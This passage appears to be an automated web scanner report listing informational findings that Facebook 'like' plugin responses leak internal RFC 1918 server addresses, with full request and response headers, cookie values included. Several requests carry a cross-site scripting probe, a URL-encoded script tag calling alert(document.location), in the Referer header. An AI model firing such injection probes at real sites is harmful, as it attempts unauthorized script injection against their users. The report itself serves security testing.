X-FB-Server: 10.36.80.130
X-Cnection: close
Date: Sat, 17 Sep 2011 17:36:22 GMT
Content-Length: 26032

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.83. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=225566057486878&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2e373bb4%26origin%3Dhttp%253A%252F%252Fwww.uproxx.com%252Ffe08a6e4%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.uproxx.com%2Ftechnology%2F2011%2F09%2Fsony-really-doesnt-want-you-to-buy-the-playstation-vita%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.uproxx.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.87.114
X-Cnection: close
Date: Sat, 17 Sep 2011 17:36:23 GMT
Content-Length: 26010

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.84. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://ellegirl.elle.com/teen-fashion/2011/get-the-look-long-live-rock-n-roll/&layout=button_count&show_faces=false&width=120&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.255.28
X-Cnection: close
Date: Sat, 17 Sep 2011 16:34:56 GMT
Content-Length: 23479

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.85. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=225566057486878&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfb74ddda4%26origin%3Dhttp%253A%252F%252Fwww.uproxx.com%252Ffe08a6e4%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.uproxx.com%2Fwebculture%2F2011%2F09%2Fdisney-ladies-texts-from-last-night-win%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.uproxx.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.74.120
X-Cnection: close
Date: Sat, 17 Sep 2011 17:36:23 GMT
Content-Length: 25978

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.86. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://ellegirl.elle.com/teen-fashion/2011/sneaker-freak-and-proud-of-it/&layout=button_count&show_faces=false&width=120&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.246.63
X-Cnection: close
Date: Sat, 17 Sep 2011 16:51:21 GMT
Content-Length: 23476

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.87. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://ellegirl.elle.com/teen-fashion/2011/10-things-we-want-from-missioni-x-target/&layout=button_count&show_faces=false&width=120&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.195.79
X-Cnection: close
Date: Sat, 17 Sep 2011 16:25:01 GMT
Content-Length: 23349

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.88. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=168416309885734&href=http%3A%2F%2Fwww.facebook.com%2Fugodotcom&send=false&layout=button_count&width=90&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.229.47
X-Cnection: close
Date: Sat, 17 Sep 2011 16:57:08 GMT
Content-Length: 23289

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.89. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://ellegirl.elle.com/teen-health-beauty/2011/fall-2011-makeup-round-up/&layout=button_count&show_faces=false&width=120&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.221.47
X-Cnection: close
Date: Sat, 17 Sep 2011 16:25:01 GMT
Content-Length: 23340

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.90. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://facebook.com/mymanilla&layout=button_count&show_faces=false&width=136&action=like&font&colorscheme=light&height=26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.manilla.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.42.49
X-Cnection: close
Date: Sat, 17 Sep 2011 16:35:58 GMT
Content-Length: 23278

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.91. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=168416309885734&href=http%3A%2F%2Fwww.facebook.com%2Fugodotcom&send=false&layout=button_count&width=90&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.40.39
X-Cnection: close
Date: Sat, 17 Sep 2011 16:36:56 GMT
Content-Length: 23289

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.92. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://ellegirl.elle.com/teen-health-beauty/2011/fall-2011-makeup-round-up/&layout=button_count&show_faces=false&width=120&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.18.52
X-Cnection: close
Date: Sat, 17 Sep 2011 16:34:40 GMT
Content-Length: 23479

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.93. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://ellegirl.elle.com/teen-fashion/2011/have-a-very-mod-tastic-fall/&layout=button_count&show_faces=false&width=120&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.30.58
X-Cnection: close
Date: Sat, 17 Sep 2011 16:34:40 GMT
Content-Length: 23473

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.94. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=225566057486878&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd7bbf84%26origin%3Dhttp%253A%252F%252Fwww.uproxx.com%252Ffe08a6e4%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.uproxx.com%2Fmedia%2F2011%2F09%2Fesquire-scribe-jon-stewart-is-a-dck%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.uproxx.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.109.131
X-Cnection: close
Date: Sat, 17 Sep 2011 17:36:22 GMT
Content-Length: 25929

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.95. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://ellegirl.elle.com/teen-life/2011/dear-freshman-love-the-undecided-major/&layout=button_count&show_faces=false&width=120&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.125.49
X-Cnection: close
Date: Sat, 17 Sep 2011 16:24:57 GMT
Content-Length: 23344

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.96. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=225566057486878&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3429dd32%26origin%3Dhttp%253A%252F%252Fwww.uproxx.com%252Ffe08a6e4%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.uproxx.com%2Fwebculture%2F2011%2F09%2Fmeme-watch-sheltered-college-freshman%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.uproxx.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.78.115
X-Cnection: close
Date: Sat, 17 Sep 2011 17:36:23 GMT
Content-Length: 25952

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.97. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://ellegirl.elle.com/teen-fashion/2011/get-the-look-long-live-rock-n-roll/&layout=button_count&show_faces=false&width=120&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.17.47
X-Cnection: close
Date: Sat, 17 Sep 2011 16:34:43 GMT
Content-Length: 23480

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.98. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=225566057486878&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df55dd0a18%26origin%3Dhttp%253A%252F%252Fwww.uproxx.com%252Ffe08a6e4%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.uproxx.com%2Fwebculture%2F2011%2F09%2Fthe-best-of-its-always-sunny-in-philadelphia-gifs%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.uproxx.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.101.120
X-Cnection: close
Date: Sat, 17 Sep 2011 17:36:23 GMT
Content-Length: 26008

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.99. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=168416309885734&href=http%3A%2F%2Fwww.facebook.com%2Fugodotcom&send=false&layout=button_count&width=90&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.243.43
X-Cnection: close
Date: Sat, 17 Sep 2011 16:31:24 GMT
Content-Length: 23289

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
22.100. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

